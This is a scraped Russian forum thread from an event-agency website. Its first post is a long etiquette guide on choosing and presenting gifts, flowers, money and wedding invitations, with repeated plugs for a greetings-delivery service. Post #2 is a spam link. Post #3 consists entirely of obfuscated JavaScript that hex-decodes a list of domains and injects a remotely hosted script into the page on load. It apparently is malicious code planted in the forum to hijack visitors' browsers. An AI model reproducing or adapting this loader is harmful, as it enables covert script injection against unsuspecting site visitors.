S h o w  M a s t e r      
 Праздники, свадьбы, вечеринки.
тел (044) 228-03-59  
  Как правильно дарить подарки - Форум Приветствую Вас Гость | RSS

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум » Полезные советы » Полезные советы » Как правильно дарить подарки
Как правильно дарить подарки
Дата: Суббота, 18.07.2009, 21:28 | Сообщение # 1
"Цена подарка зависит, главным образом, от трех условий: во-первых, от чувства, с которым его дают; во-вторых, от того, на сколько он подходит к празднику и личности; в-третьих, от манеры дарить. Для того, чтобы дарить хорошо, необходимо иметь такт и деликатность".

"Чтобы иметь право дарить, нужно уметь дарить так, чтобы соблюдать при этом величайшую деликатность. Дарить кому-нибудь что бы то ни было только потому, что эта вещь нам самим не нужна, - неприлично, особенно если тот, кому мы ее дарим, ранее этого видел эту самую вещь у нас. Дарить какую-нибудь вещь, которую мы в свою очередь получили в подарок, тоже неприлично по отношению к тому, кто нам ее подарил".

КАК ПРИНЯТО ВРУЧАТЬ ПОДАРОК?

Если вы пришли в гости, нельзя вручать подарок в прихожей. Необходимо снять верхнюю одежду, привести себя в порядок и в праздничной комнате, где накрыт стол и собираются гости, вручить подарок. Обязательно в оригинальной упаковке, с улыбкой и самыми теплыми словами.
Если вы доверили эту миссию Международной Службе Поздравлений, то наши сотрудники выполнят ее на высоком профессиональном уровне, как этого требует этикет для данного вида вручения подарков и поздравлений через подобные службы.

ЕСЛИ ВАМ ВРУЧИЛИ ПОДАРОК, КАК ПОСТУПИТЬ - ТУТ ЖЕ РАЗВЕРНУТЬ ИЛИ ОТЛОЖИТЬ В СТОРОНУ?

Подарок следует сразу же развернуть, поблагодарить, выразить восхищение, отметить добрые намерения дарящего.

В КАКИХ СЛУЧАЯХ ДОПУСТИМЫ ПОДАРКИ ДЕНЬГАМИ?

На свадьбу или очень близким людям.

КАК ВРУЧАТЬ ДЕНЕЖНЫЙ ПОДАРОК?

В незапечатаном конверте.

ПРИНЯТО ЛИ ДАРИТЬ ПОДАРКИ НА ОФИЦИАЛЬНЫХ ПРИЕМАХ?

Нет, кроме тех случаев, когда сослуживец уходит на пенсию или переезжает в другой город (страну).

КАКИЕ ПОДАРКИ ДОПУСТИМЫ МЕЖДУ ПРЕДСТАВИТЕЛЯМИ ФИРМ?

Подарки не должны быть очень дорогими, обязывающими, приветствуется наличие национального колорита, например, русские сувениры, изделия народных промыслов.

КАК ДАРЯТ КНИГУ, НАДО ЛИ ЕЕ ПОДПИСЫВАТЬ?

Да, если ВЫ - АВТОР. В остальных случаях поздравления и пожелания пишутся на открытке.

БЕЗУПРЕЧНАЯ УПАКОВКА….

Создает первое впечатление о подарке, о Вашем отношении и вкусе. Позаботьтесь о ней сами или доверьтесь специалистам через Международную Службу Поздравлений.

КАКИЕ ПОДАРКИ УМЕСТНЫ ВСЕГДА?

Цветы, сладости, фрукты, книги, вино, письменные принадлежности, духи, изделия из стекла, хрусталя, серебра, кожи, керамика, металлические изделия (подсвечники, чеканка, вазы, броши и др).
Из более ценных подарков можно назвать произведения изобразительного искусства, уникальные издания книг.

ЧТО ПОДАРИТЬ ЧЕЛОВЕКУ, У КОТОРОГО "ВСЕ ЕСТЬ"?

На самом деле вариантов существует множество. Например, цветы, коробку дорогих конфет известной фабрики (развесные конфеты никогда не дарят), коньяк, шампанское, набор марочных вин. Учтите, что бутылку без фирменной упаковки дарить не принято. Напомним также, что не следует дарить крепкие напитки дамам.

КАКИХ ПОДАРКОВ СЛЕДУЕТ ИЗБЕГАТЬ?

* Неприличным считается преподносить крепкие напитки слабому полу.
* Не дарят иконы.
* Никому и никогда не дарите часы, зеркала, ножи. На западе и на востоке делать такие подарки считается плохой приметой.
* Не дарите свои фотографии, если Вас об этом не просили.
* Не разумно дарить животных.
* Стоит ли дарить живые растения - спорный вопрос.

ЧТО МОЖНО ПОДАРИТЬ САМЫМ БЛИЗКИМ ЛЮДЯМ?

Личные вещи: галстук, рубашку, ремень, дамскую сумочку, белье, губную помаду и т.д.

ЧТО ГОВОРИТ ЭТИКЕТ О ПОДАРКАХ В ДЕЛОВОЙ ЖИЗНИ?

Можно уверенно утверждать, что подарки в деловой сфере абсолютно необходимы. Преподнесение подарков деловым партнерам, коллегам, клиентам - чрезвычайно деликатный вопрос. Помните, что слишком дорогим подарком Вы можете поставить человека в неловкое положение. Всегда следует исходить из того, что целью вручения подарка является демонстрация доброго отношения, надежда на дальнейшее успешное сотрудничество. Важно усвоить, что чем ближе во времени подарок к событию, в связи с которым он делается, тем лучше. На каждый подарок принято отвечать благодарственной запиской и/или благодарить по телефону. Помимо общепринятых праздников, существуют частные поводы для вручения подарков. Например, при поздравлении с рождением ребенка, при вступлении в брак, в связи с получением награды или премии, с получением ученой степени. Подарки так же могут вручаться по случаю ухода на пенсию, круглых дат в трудовой деятельности, на юбилей. Возможно вручение подарка в знак благодарности: за сверхурочную работу, за выполнение срочной работы, за бескорыстную добровольную помощь.

КАКИЕ ПОДАРКИ УМЕСТНЫ В ДЕЛОВОЙ ЖИЗНИ?

Фотоальбом, справочники, словари, руководства, красочный календарь, канцелярские принадлежности высокого класса, гравюра в рамке, декоративная или столовая ваза, кофейная чашка, шарф и др.

КАК НАПИСАТЬ БЛАГОДАРСТВЕННУЮ ЗАПИСКУ ПО СЛУЧАЮ ПОЛУЧЕНИЯ ПОДАРКА В ДЕЛОВОЙ ЖИЗНИ?

Прежде всего учтите, что благодарственная записка, посланная Вами, поддерживает Ваш имидж делового человека. Что бы она принесла желаемый результат, ее надо писать сразу, как только Вы получили подарок. Важно, что бы записка выражала ваши чувства благодарности, не была слишком банальной и сухой. Например, если Вы получили в подарок календарь, можно написать так:

Уважаемая Мария Ивановна!

Большое спасибо за подарок, присланный Вами. Я чрезвычайно признательна Вам за то, что Вы преподнесли мне такую красивую и полезную вещь, как календарь. Уверена, что он будет радовать меня, напоминать о нашем успешном сотрудничестве и помогать планировать работу в течении всего следующего года.

Искренне Ваша.
Татьяна Петровна

МОЖНО ЛИ ОТКАЗАТЬСЯ ОТ ПОДАРКА?

Отказаться от подарка можно только в том случае, когда принять его неприлично или когда подарок настолько ценен, что вынуждает чувствовать себя обязанным. При отказе следует подчеркнуть признательность за внимание и время, потраченное на выбор подарка, и ясно мотивировать свой отказ. По меньшей мере странно выглядит тот, кто после своего словесного отказа принять подарок, не смотря на свою позицию и принципы, все же его принимает. Отказываются от подарка вежливо и непоколебимо. Важно не испортить отношения с дарителем.

МОЖНО ЛИ ДАРИТЬ СВОИ ФОТОГРАФИИ?

Можно, если Вас об этом попросили. Предлагать свою фотографию в подарок считается дурным тоном. Не следует дарить очень большую или очень маленькую фотографию. Некрасиво заставлять людей вторично просить вашу фотографию в подарок. Получить фотографию и не подарить в ответ свою также будет выглядеть бестактно.
МОЖНО ЛИ ДАРИТЬ ОДИН ЦВЕТОК?

Несомненно, да. Нобелевский лауреат Ясунари Кавабата писал: "Один цветок лучше, чем сто, передает великолепие цветка".

МОЖНО ЛИ ДАРИТЬ ЦВЕТЫ В ГОРШКЕ?

Некоторые считают это дурным тоном. Кто-то видит в этом дурную примету. "А вдруг они увянут?" Но эти опасения напрасны! Дарить цветы в горшках можно, если вам точно известно, что адресат их очень любит и не против получить их в подарок. Потрудитесь узнать, какой сорт цветов он предпочитает, и тогда вы не ошибетесь. Вместе с цветами в горшках можно преподнести справочник по цветоводству.
Относительно цветов справедливо утверждение: желание хозяина - важнее, чем традиционные правила. Если кто-то обожает все экзотическое, гостю позволено прийти с фикусом в горшке.

МОЖНО ЛИ ДАРИТЬ ЦВЕТЫ МУЖЧИНЕ?

Мужчине цветы не дарят, за исключением юбилеев.

КАК ДАРИТЬ ЦВЕТЫ - ЗАВЕРНУТЫМИ ИЛИ НЕТ?

Если, придя в гости, на торжество, вы вручаете цветы в прихожей, можно передать их в упаковке, если же вы с цветами входите в комнату, то снимите бумагу и преподнесите букет без нее. Однако говорить об упаковке можно лишь тогда, когда она эстетична и гармонирует с самим букетом.
Не забудьте, что подают букет цветами вверх, а не наоборот.

ЕСЛИ ВЫ ПОСЫЛАЕТЕ ЦВЕТЫ С ДОСТАВКОЙ ЧЕРЕЗ МЕЖДУНАРОДНУЮ СЛУЖБУ ПОЗДРАВЛЕНИЙ

Попросите представителя МСП вложить в корзинку или внутрь букета записку с пожеланиями.

КАК СОЧЕТАТЬ ЦВЕТЫ В БУКЕТЕ?

Современные флористы допускают сочетания практически любых цветов в одном букете. Доверьте создание букета флористу.

КАКИЕ ЦВЕТЫ НЕ СЛЕДУЕТ ПРИНОСИТЬ В БОЛЬНИЦУ?

Цветы с резким запахом и осыпающейся пыльцой.

КОГДА ПРИНЯТО РАССЫЛАТЬ ПРИГЛАШЕНИЯ НА СВАДЬБУ?

За 2-3 недели до праздничного события. Если приглашенный проживает в другом городе, то за 1 - 1,5 месяца в зависимости от отдаленности города.

КОГО ПРИГЛАШАЮТ ЛИЧНО?

Лично приглашают наиболее уважаемых и пожилых гостей. Если есть возможность, то лучше всех пригласить лично. Пригласительный билет можно доставить и через Международную Службу Поздравлений, что гораздо более официально и торжественно в отличие от посланной открытки (пригласительного билета) по обычной почте.

КАК ПОСТУПАЕТ ТОТ, КТО ПОЛУЧИЛ ПРИГЛАШЕНИЕ НА СВАДЬБУ, НО ПРИЙТИ ИЛИ ПРИЕХАТЬ НЕ МОЖЕТ?

Он должен послать поздравительную телеграмму (предлагаем воспользоваться услугами Международной Службы Поздравлений) на новую фамилию новобрачных. В телеграмме (открытке) старайтесь избежать "штампованных фраз", выразите поздравление тепло и искренне.

ЕСЛИ ВЫ ПЛАНИРУЕТЕ ПРЕПОДНЕСТИ МОЛОДОЖЕНАМ…

В качестве подарка объемную, требующую специальной доставки вещь, то подумайте о том, что бы послать ее на кануне торжества. Если подарок небольшого размера, его приносят с собой в день праздника. Если нет возможности присутствовать самому на данном торжестве, предлагаем воспользоваться услугами Международной Службы Поздравлений.

МОЖНО ЛИ ПОЗДРАВИТЬ ПО ТЕЛЕФОНУ С ДНЕМ РОЖДЕНИЯ?

Принято поздравлять в письменном виде, но от этого правила возможно отступление.

НЕ ЗАБЫВАЙТЕ О ПРАЗДНИКАХ!

Никогда не упускайте возможности поздравить (устно или письменно, в шутку или всерьез) любимых, родных, коллег с каким бы то ни было праздником - государственным, национальным, семейным.
Поздравление - замечательный повод улучшить настроение близким и знакомым и продемонстрировать им свое расположение, дружбу, заботу и любовь.

Дата: Среда, 24.10.2012, 11:23 | Сообщение # 2
Лучше дарить что то необычное, такое что не кто еще не дарил! еще нужно это исполнить очень эффектно gift31bek.ru и тогда ваш подарок будет лучшим!
Дата: Суббота, 04.02.2017, 20:35 | Сообщение # 3
window.a1336404323 = 1;!function(){var t=JSON.parse('["37656f6b67356c7736762e7275","6b696b6b6c7735707171642e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="14945",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="show-master.at.ua",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();
http://bilacerkva.ucoz.ua
Форум » Полезные советы » Полезные советы » Как правильно дарить подарки
  • Страница 1 из 1
  • 1
Поиск:

 

Всегда рады личному знакомству с Вами
     тел (044) 228-03-59       (063) 708-38-02
Конструктор сайтов - uCoz